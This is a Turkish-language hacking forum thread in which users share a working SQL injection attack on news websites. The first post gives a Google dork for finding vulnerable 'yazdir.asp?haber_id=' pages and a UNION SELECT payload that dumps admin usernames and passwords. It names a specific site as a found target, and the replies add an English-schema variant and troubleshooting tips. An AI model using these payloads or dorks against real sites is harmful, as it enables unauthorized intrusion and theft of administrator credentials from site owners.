türk haber sitelerinin açığı

H

hacked_by_shan

Katılımcı Üye
24 Tem 2008
332
1
istanbul
Google dork: inurl:yazdir.asp?haber_id= bunu aratıyoruz.

haber_id= den sonra bir sayı geliyor. o sayıyı silip yerine

1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0 ,0,0,0%20from%20ayarlar%20where%20admin=admin

Kodumuzu yapıştırıyoruz..

Karşımıza admin ve passları geliyor..

denenmiştir , çalışıyor
fakat lütfen Türk sitelerine zarar vermeyelim

size düşen tek şey flashgetle sitenin admin sayfasını bulmak
örnek site veriyorum , bizzat kendim buldum buyrun : www.TuncayOZEN.Com.Tr
:inv:inv:diablo:diablo:diablo:diablo:diablo:inv:inv
 
H

hellgod

Yeni üye
1 Şub 2009
14
0
çoğu site ODBC hatası veriyor Sanırım Web Server Açarken ODBC'ye girilen SQL bağlantı noktaları oluyor onlarla alakalı bi durum veya Ayarlar sekmesi değişken olabilirmi?

Ayrıca Kendi Kendinle çelişiyorsun

fakat lütfen Türk sitelerine zarar vermeyelim yazıyorsun ama

1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0 ,0,0,0%20from%20ayarlar%20where%20admin=admin

türk siteleri için zaten yabancı bir site için olsa muhtemelen

1%20union%20select%200,admin,passoword,0,0,0,0,0,0,0,0 ,0,0,0%20from%20settings%20where%20admin=admin

olurdu.

ama emeğin için çok sağol gerçekten güzel bi paylaşım mantıken zaten admin=admin veya bunu sanıyorum 1=1 de yapabiliriz bunlar admin girişi olarak değerlendiriliyor açığı olan sitelere admin olarak login olmuş olucaz şifreleri görmemiz ilginç değil çok güzel bi paylaşım.
 
H

hacked_by_shan

Katılımcı Üye
24 Tem 2008
332
1
istanbul
hellgod' Alıntı:
çoğu site ODBC hatası veriyor Sanırım Web Server Açarken ODBC'ye girilen SQL bağlantı noktaları oluyor onlarla alakalı bi durum veya Ayarlar sekmesi değişken olabilirmi?

Ayrıca Kendi Kendinle çelişiyorsun

fakat lütfen Türk sitelerine zarar vermeyelim yazıyorsun ama

1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0 ,0,0,0%20from%20ayarlar%20where%20admin=admin

türk siteleri için zaten yabancı bir site için olsa muhtemelen

1%20union%20select%200,admin,passoword,0,0,0,0,0,0,0,0 ,0,0,0%20from%20settings%20where%20admin=admin

olurdu.

ama emeğin için çok sağol gerçekten güzel bi paylaşım mantıken zaten admin=admin veya bunu sanıyorum 1=1 de yapabiliriz bunlar admin girişi olarak değerlendiriliyor açığı olan sitelere admin olarak login olmuş olucaz şifreleri görmemiz ilginç değil çok güzel bi paylaşım.
Genişletmek için tıkla ...

verdiği hatada tablodaki değişkenleri ,değştirmeyi deneyebilirsin ya da ' ' tırnak içinde verdiği kodları tablo ismi olarak değerlendirebilirsin

dediğin gibi kardeşim , zaten işin mantıgını kaptıysan türkçe yazan yerleri ingilizceye cevirip kullanabilirsin , türk sitelerine zarar vermeyelim ama uyarı yapalım dimi , tüm türk sitelerinin açıklarının kapanması dileğiyle ;)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.